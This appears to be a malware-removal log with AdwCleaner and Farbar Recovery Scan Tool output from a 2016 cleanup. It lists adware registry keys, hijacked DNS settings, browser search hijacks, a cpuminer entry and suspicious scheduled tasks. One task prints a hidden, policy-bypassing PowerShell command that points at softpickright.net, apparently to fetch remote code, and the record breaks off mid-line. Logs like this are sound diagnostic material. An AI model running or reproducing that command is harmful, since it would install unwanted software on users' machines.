HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762} Key Found : HKLM\SOFTWARE\Classes\CLSID\{B608CC98-54DE-4775-96C9-097DE398500C} Key Found : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8} Key Found : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} Key Found : HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C} Key Found : HKLM\SOFTWARE\Classes\CLSID\{567DBF58-4713-45F4-A623-E7B41F898209} Key Found : HKLM\SOFTWARE\Classes\CLSID\{3BEACC4A-B617-4519-BB20-E5970414CBE4} Key Found : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319} Key Found : HKLM\SOFTWARE\Classes\CLSID\{FD20C151-A061-4097-955D-682F317A7035} Key Found : HKLM\SOFTWARE\Classes\CLSID\{567dbf58-4713-45f4-a623-e7b41f898209} Key Found : HKLM\SOFTWARE\Classes\Interface\{59E4833B-32B3-45A3-B28C-4349694AEA0B} Key Found : HKLM\SOFTWARE\Classes\Interface\{6EDC6CDA-ED56-4E35-B0C9-FC7BE7E5785E} Key Found : HKLM\SOFTWARE\Classes\TypeLib\{48DD0C01-D406-4CDF-A47D-50F22ECBB63A} Key Found : HKLM\SOFTWARE\Classes\TypeLib\{5203590B-4F3D-45B6-8481-7A15CF21E7E1} Key Found : HKLM\SOFTWARE\Classes\TypeLib\{764EADA5-B946-4AD8-B4D6-5CD91834FF0E} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{567DBF58-4713-45F4-A623-E7B41F898209} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3BEACC4A-B617-4519-BB20-E5970414CBE4} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{567dbf58-4713-45f4-a623-e7b41f898209} Key Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B49699FC-1665-4414-A1CB-C4A2A4A13EEC} Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B49699FC-1665-4414-A1CB-C4A2A4A13EEC} Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B608CC98-54DE-4775-96C9-097DE398500C} Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3BEACC4A-B617-4519-BB20-E5970414CBE4} Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B49699FC-1665-4414-A1CB-C4A2A4A13EEC} Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B608CC98-54DE-4775-96C9-097DE398500C} Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3BEACC4A-B617-4519-BB20-E5970414CBE4} Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7D87094D-49E1-4C72-8C9E-3D937A119BE5} Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{051E9166-B275-4683-907B-372FAE22BC7C} Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{E5A7A645-8318-4895-B85C-EDC606B80DB6} Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C} Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{59E4833B-32B3-45A3-B28C-4349694AEA0B} Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6EDC6CDA-ED56-4E35-B0C9-FC7BE7E5785E} Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7D87094D-49E1-4C72-8C9E-3D937A119BE5} Key Found : HKCU\Software\BoBrowser Key Found : HKCU\Software\DAILYPCCLEAN Key Found : HKCU\Software\Microsoft\Tinstalls Key Found : HKCU\Software\Mozilla\Extends Key Found : HKCU\Software\ProfessionalCleaningSoftwareLanguage Key Found : HKCU\Software\Reg\Clean Key Found : HKCU\Software\Store Key Found : HKCU\Software\tstamptoken Key Found : HKCU\Software\Tutorials Key Found : HKCU\Software\TutoTag Key Found : HKCU\Software\WTools Key Found : HKCU\Software\AppDataLow\Software\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885} Key Found : HKCU\Software\AppDataLow\Software\DailyWiki Key Found : HKCU\Software\AppDataLow\Software\DynConIE Key Found : HKCU\Software\AppDataLow\Software\TidyNetwork Key Found : HKLM\SOFTWARE\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885} Key Found : HKLM\SOFTWARE\Clara Key Found : HKLM\SOFTWARE\DAILYPCCLEAN Key Found : HKLM\SOFTWARE\FFPluginHp Key Found : HKLM\SOFTWARE\FlashBeat Key Found : HKLM\SOFTWARE\istartpageingSoftware Key Found : HKLM\SOFTWARE\Professional Cleaning Software Key Found : HKLM\SOFTWARE\Reg\Clean Key Found : HKLM\SOFTWARE\SmartDNS Key Found : HKLM\SOFTWARE\SpaceSondPro Key Found : HKLM\SOFTWARE\SwiftSearch_1.10.0.25 Key Found : HKLM\SOFTWARE\Tutorials Key Found : HKLM\SOFTWARE\WajaNetEn Key Found : HKLM\SOFTWARE\WdsManPro Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1 Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8DBC5A0A-31C4-46C7-B252-6B593EA11A87} Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1 Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DailyPCClean_is1 Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZombieNews Key Found : [x64] HKLM\SOFTWARE\FlashBeat Key Found : [x64] HKLM\SOFTWARE\WajaNetEn Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1 Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer Key Found : HKU\.DEFAULT\Software\AppDataLow\Software\Compete Key Found : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4 Key Found : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4 Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4 Key Found : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4 Value Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain] Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{187E1DF6-DFD0-4217-B13D-6069A2CE3B70} Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{398B2D84-6A60-43BD-9832-6B70D8E6F841} Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} Data Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {ielnksrch} Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ielnksrch Value Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain] Data Found : HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command [] - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartpageing.com/?type=sc&ts=1452823320&z=f959342320f8bfa8cd09b0eg8zawao6b8o6c3c1g1g&from=cmi&uid=WDCXWD5000LPVX-60V0TT0_WD-WXE1E24VM102VM102 Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer] - 82.163.143.171 82.163.142.173 Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{5b2806b2-f442-4f31-8ba9-5b5aff22f10b} [NameServer] - 82.163.143.171 82.163.142.173 Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{703089d7-b1ac-4a63-9543-776aae06c9b1} [NameServer] - 82.163.143.171 82.163.142.173 Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{7fed4267-ce71-4810-99d1-c4794f8e87f7} [NameServer] - 82.163.143.171 82.163.142.173 Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{5b2806b2-f442-4f31-8ba9-5b5aff22f10b} [NameServer] - 82.163.143.171 82.163.142.173 Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{703089d7-b1ac-4a63-9543-776aae06c9b1} [NameServer] - 82.163.143.171 82.163.142.173 Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{7fed4267-ce71-4810-99d1-c4794f8e87f7} [NameServer] - 82.163.143.171 82.163.142.173 Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [CrashService] Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [itibiti.exe] Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [QuickyTranslator] Value Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [cpuminer] Value Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [spaceSoundPro] ***** [ Web browsers ] ***** [C:\Users\Albert\AppData\Roaming\Mozilla\Firefox\Profiles\gmzl01z0.default\prefs.js] [Preference] Found : user_pref("browser.search.defaultenginename.US", "findit"); [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : aol.com [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : ask.com [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : www-searching.com [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : mpc safe search ########## EOF - C:\AdwCleaner\AdwCleaner[s1].txt - [15413 bytes] ########## ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Fixlog.txt Fix result of Farbar Recovery Scan Tool (x64) Version:17-02-2016 Ran by Albert (2016-02-19 10:26:51) Run:1 Running from C:\FRST Loaded Profiles: Albert (Available Profiles: Albert & Administrator) Boot Mode: Normal ============================================== fixlist content: ***************** HKLM-x32\...\Run: [mpck_us_017010207] => [X] HKLM-x32\...\Run: [ospd_us_037010239] => [X] HKLM-x32\...\Run: [oasi_en_066020241] => [X] HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [birds] => C:\Users\Albert\AppData\Local\Birds\birds365.exe HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [Windi] => C:\ProgramData\DataFile\Windi.exe HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [CrashService] => "C:\Users\Albert\AppData\Local\BoBrowser\Application\crash_service.exe" --max-reports=50 --no-window HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj6YamLW4mQvWWqwdHfGpNZb_UC8RdJA0avf3B_FSg3QXYGcuegU68e_HrbqFTo8hU8Enjb5lsvARdSNAsjI9x0XsgYfE, HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3320133&octid=EB_ORIGINAL_CTID&ISID=M946F9A01-90D4-44C9-8872-4F7C3D1541EA&SearchSource=58&CUI=&UM=8&UP=SPD69C94D0-81AA-4588-9055-EE8D77975EE2&D=011416&q={searchTerms}&SSPV= SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV9dUVoTQgUUbQ4LUQtcFQ1BchQAWVoQDFQUeFgBVl9ARQNBeB9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms} SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {187E1DF6-DFD0-4217-B13D-6069A2CE3B70} URL = hxxp://www-mysearch.com/s.ashx?prd=opensearch&q={searchTerms}&s=G2Fzftptn095001,46b42c9a-c2ab-48f3-88cf-c6115551b0b1, SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {398B2D84-6A60-43BD-9832-6B70D8E6F841} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G2Fzftpbl2,edf3912e-2678-4f05-b13c-8b84d60c8675, SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms}Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File BHO-x32: Search Web Know -> {3beacc4a-b617-4519-bb20-e5970414cbe4} -> C:\Program Files (x86)\Search Web Know\Extensions\3beacc4a-b617-4519-bb20-e5970414cbe4.dll => No File BHO-x322016-02-16 09:56 - 2016-02-16 09:56 - 00000000 ____D C:\WINDOWS\system32\oci: Oasis Space 1.0.0.7 -> {567dbf58-4713-45f4-a623-e7b41f898209} -> C:\Program Files (x86)\Oasis Space\OasisSpacebho.dll => No FileFramework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => No File 2016-02-16 09:53 - 2016-02-17 16:00 - 00000000 ____D C:\ProgramData\Browser 2016-02-16 09:47 - 2016-02-16 09:47 - 00000000 ____D C:\WINDOWS\system32\jyoj 2016-02-16 04:31 - 2016-02-16 04:31 - 00000000 ____D C:\WINDOWS\system32\jij 2016-02-16 04:23 - 2016-02-16 04:23 - 00000000 ____D C:\WINDOWS\system32\teh 2016-02-16 03:46 - 2016-02-16 03:46 - 00000000 ____D C:\WINDOWS\system32\cokb 2016-02-16 03:32 - 2016-02-16 03:32 - 00000000 ____D C:\WINDOWS\system32\kijh 2016-02-16 02:51 - 2016-02-16 02:51 - 00000000 ____D C:\WINDOWS\system32\gaf 2016-02-16 02:36 - 2016-02-16 03:25 - 00000000 ____D C:\Program Files\shopperz160220160808 2016-02-16 02:36 - 2016-02-16 02:36 - 00003398 _____ C:\WINDOWS\System32\Tasks\Afefph 2016-02-16 02:34 - 2016-02-17 16:00 - 00000000 ____D C:\Program Files (x86)\DailyPcClean Support 2016-02-16 02:34 - 2016-02-16 02:34 - 00000000 ____D C:\Users\Albert\Documents\DailyPCClean 2016-02-16 02:31 - 2016-02-17 16:00 - 00000000 __SHD C:\Users\Albert\AppData\Local\winone 2016-02-16 02:31 - 2016-02-16 02:32 - 00000000 __SHD C:\Users\Albert\AppData\Local\Dynamation 2016-02-16 02:31 - 2016-02-16 02:32 - 00000000 ___HD C:\Users\Albert\AppData\Local\One10_PC_CleanerUn 2016-02-16 02:31 - 2016-02-16 02:31 - 00000000 ___HD C:\Users\Albert\AppData\Local\SatakMalwareBusterSetup 2016-02-16 01:56 - 2016-02-16 01:56 - 00000000 ____D C:\Users\Albert\AppData\Local\ElevatedDiagnostics 2016-02-16 01:38 - 2016-02-16 01:38 - 00000000 _____ C:\places.sqlite 2016-02-15 18:49 - 2016-02-15 18:49 - 00000000 ____D C:\WINDOWS\system32\sonq 2016-02-15 18:36 - 2016-02-16 09:53 - 00003520 _____ C:\WINDOWS\System32\Tasks\Muueguehnlaek 2016-02-15 18:36 - 2016-02-15 18:36 - 00000000 ____D C:\ProgramData\Muueguehnlaek 2016-02-15 18:30 - 2016-02-18 09:35 - 00000350 ____H C:\WINDOWS\Tasks\VJBJMDRJBRJCQACG.job 2016-02-15 18:30 - 2016-02-18 09:35 - 00000350 ____H C:\WINDOWS\Tasks\NPSEYLEPFCUWGUQR.job 2016-02-15 18:30 - 2016-02-15 18:30 - 00003428 _____ C:\WINDOWS\System32\Tasks\VJBJMDRJBRJCQACG 2016-02-15 18:30 - 2016-02-15 18:30 - 00003428 _____ C:\WINDOWS\System32\Tasks\NPSEYLEPFCUWGUQR 2016-02-15 18:29 - 2016-02-17 17:06 - 00000000 ____D C:\Program Files\shopperz150220161159 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\Service1291 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\Service1104 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\19a87fa1ec024bbcbb41931263354405 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results 2016-02-17 16:43 - 2016-02-17 16:43 - 7950848 _____ () C:\Users\Albert\AppData\Roaming\agent.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0054272 _____ () C:\Users\Albert\AppData\Roaming\ApplicationHosting.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0062976 _____ () C:\Users\Albert\AppData\Roaming\Config.xml 2016-02-17 16:42 - 2016-02-17 16:42 - 0017472 _____ () C:\Users\Albert\AppData\Roaming\InstallationConfiguration.xml 2016-02-17 16:42 - 2016-02-17 16:42 - 0126976 _____ () C:\Users\Albert\AppData\Roaming\Installer.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0126464 _____ () C:\Users\Albert\AppData\Roaming\lobby.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0018432 _____ () C:\Users\Albert\AppData\Roaming\Main.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0005568 _____ () C:\Users\Albert\AppData\Roaming\md.xml 2016-02-17 16:43 - 2016-02-17 16:43 - 1881607 _____ () C:\Users\Albert\AppData\Roaming\Newfan.tst 2016-02-17 16:43 - 2016-02-17 16:43 - 0126464 _____ () C:\Users\Albert\AppData\Roaming\noah.dat 2016-02-17 16:42 - 2016-02-17 16:42 - 0848437 _____ () C:\Users\Albert\AppData\Roaming\S-Tip.bin 2016-02-17 16:42 - 2016-02-17 16:42 - 0188672 _____ () C:\Users\Albert\AppData\Roaming\Techzap.bin 2016-02-17 16:43 - 2016-02-17 16:43 - 0072806 _____ () C:\Users\Albert\AppData\Roaming\Tipin.tst 2016-02-17 16:43 - 2016-02-17 16:43 - 0032038 _____ () C:\Users\Albert\AppData\Roaming\uninstall_temp.ico 2016-01-14 22:43 - 2016-01-26 11:47 - 0000093 _____ () C:\Users\Albert\AppData\Roaming\WB.CFG 2015-03-06 19:33 - 2015-11-14 16:19 - 0007606 _____ () C:\Users\Albert\AppData\Local\resmon.resmoncfg 2016-02-15 18:30 - 2016-02-15 18:30 - 0002560 _____ () C:\Users\Albert\AppData\Local\uninstall.exe 2016-01-15 00:14 - 2016-01-15 00:14 - 0000135 _____ () C:\Users\Albert\AppData\Local\updt.js 2016-01-14 21:03 - 2016-01-14 21:03 - 0000074 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\Users\Albert\AppData\Local\Temp\compete.exe C:\Users\Albert\AppData\Local\Temp\diam18525.exe Task: {0064C8EA-67E0-4457-BD69-32D599E3C1EF} - System32\Tasks\Tionhelf => C:\PROGRA~1\SHOPPE~1\Ivafbie.bat Task: {2084E9B9-858D-4A3A-9312-521FB19716EE} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {4042D5AE-8749-4590-92C6-492AA614E28F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {54019748-4CDB-41E3-860B-E701E3C8FEF8} - System32\Tasks\NPSEYLEPFCUWGUQR => C:\ProgramData\Service1104\Service1104.exe [2016-02-15] () <==== ATTENTION Task: {57777FB8-CC07-4567-9CD4-53072709F25C} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {5C6C3B2B-DE18-44F3-8CEB-160233F5E746} - System32\Tasks\Afefph => C:\PROGRA~1\SHOPPE~2\Jabloxia.bat Task: {6D022E8A-F563-4BB6-9347-5DDA2D258152} - System32\Tasks\{9F779DF3-D491-4CB4-BB47-26D3DA7EB4A9} => pcalua.exe -a "C:\Program Files (x86)\onlysearch\onlysearch\1.4.2.4\onlysetup.exe" -c /uninstl Task: {88006AD2-3895-42CC-B38D-84A2850B48AA} - System32\Tasks\crash_service => C:\Users\Albert\AppData\Local\BoBrowser\Application\crash_service.exe <==== ATTENTION Task: {88AE8E82-77F9-4332-9850-A7A03DB62A15} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {90B854D9-6B12-416F-B8BB-C5BF4B291E72} - System32\Tasks\Run_Bobby_Browser => C:\Users\Albert\AppData\Local\BoBrowser\Application\bobrowser.exe <==== ATTENTION Task: {954ECB1A-5683-4DFB-BA1D-2683F8F031AC} - System32\Tasks\{7A040847-0B7A-0A7E-0C11-0F790B7D110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand $ E r r o r A c t i o n P r e f e r e n c e = " s t o p " ; $ s c = " S i l e n t l y C o n t i n u e " ; $ W a r n i n g P r e f e r e n c e = $ s c ; $ P r o g r e s s P r e f e r e n c e = $ s c ; $ V e r b o s e P r e f e r e n c e = $ s c ; $ D e b u g P r e f e r e n c e = $ s c ; 
 f u n c t i o n   s r ( $ p ) { $ n = " W i n d o w P o s i t i o n " ; t r y { N e w - I t e m   - P a t h   $ p | O u t - N u l l ; } c a t c h { } t r y { N e w - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - P r o p e r t y T y p e   D W O R D   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } 
 c a t c h { t r y { S e t - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } c a t c h { } } } s r ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ W i n d o w s P o w e r S h e l l _ v 1 . 0 _ p o w e r s h e l l . e x e " ) ; s r ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ s v c h o s t . e x e " ) ; s r ( " H K C U : \ C o n s o l e \ t a s k e n g . e x e " ) ; 
 $ s u r l = " h t t p : / / s o f t p i c k r i g h t . n e t / u / ? a = A I L y q 3 U B o 3 e O o c k 9 1 I u J v T a j k k 4 - a I 8 - j _ a j g R T I G V s p F 4 x h _ V T Q P m B 0 c w w c I G 1 j d H 8 w J A B 0 n o D _ g 8 q q z F f O V T E j 6 x j l a K X I E j o H n s s 6 x C U s k H f b X A _ J j P s y - v H 6 I m F 3 D - U 4 I m k 7 G t k _ 8 R X r O B Y t 5 t g _ C p 9 3 l M u V 8 T - d Y r v e 4 m G p y 3 4 L r 4 P b 3 q Y l A k - p 8 k 4 u X h 9 6 - w g l d B p D t 7 S w c P M M 2 5 w F R p P N X Z 6 w k w K 3 w O 7 A t w R z N r j G S B w a T a X 6 R U 8 m 0 5 F g A V y h x P 2 S G Y i C i 2 C o U K Q 6 q U W l 9 P Y i I e 4 e J y U l u 0 3 e 6 y b y 9 r j H n k j B K _ S f a 3 f 8 s 9 5 M 6 h n h r r b p T d 0 y o 8 X N g J p 8 r N d I N V F y Z 6 Y d Q _ f C q x R I m r q B 4 6 S z B 5 u 0 V J o D m i u O D E B C W e g v U 3 A A - G f x X D C T r A x 1 5 Z P K - q j 2 f 1 Y P w O L S w S E M 3 V t 0 K T p r S y X i 6 X n a Y o g S 8 _ l Q w h H 3 y Q v T D T W k H A d H _ E 8 W v m E r z I P P j 4 v K 5 L s c O n s O M a E 4 L S v m 1 k p U G u 6 U O J V D K x g T c y p 3 V o N d Q X k q S f r M q O J C 3 3 0 9 W v r G H Y - G f w T L B Y h J p M e i p x d F k O P q u l _ b V s q x f Y Y 4 3 i M 4 6 h r 7 V M G i q V G P G k 5 e O C s B A w i U E h f x Q x r N s H e R l D u k n z g u O F c g 4 C M A F c a z Z p B H 5 3 P x q C x 8 v g a t P V 6 4 L N W E E 0 v z C 8 c B t b j K P W i e K t _ A W 9 - A A Q 4 P I F T L N 1 y T x h Q M - J o Y 9 j f J U U 7 m n P N w g x m 1 H A s Z D O I S n o d 0 E - 4 2 q I C Y z w 3 8 Z d 4 d R V B R m V M Y m u d d s d h m 1 q e z E M x S 0 s d c W v R e O 2 x s h 8 9 - C Z r 0 C J 8 y f 8 J 0 i 6 l 2 - D J 5 q J A T P t u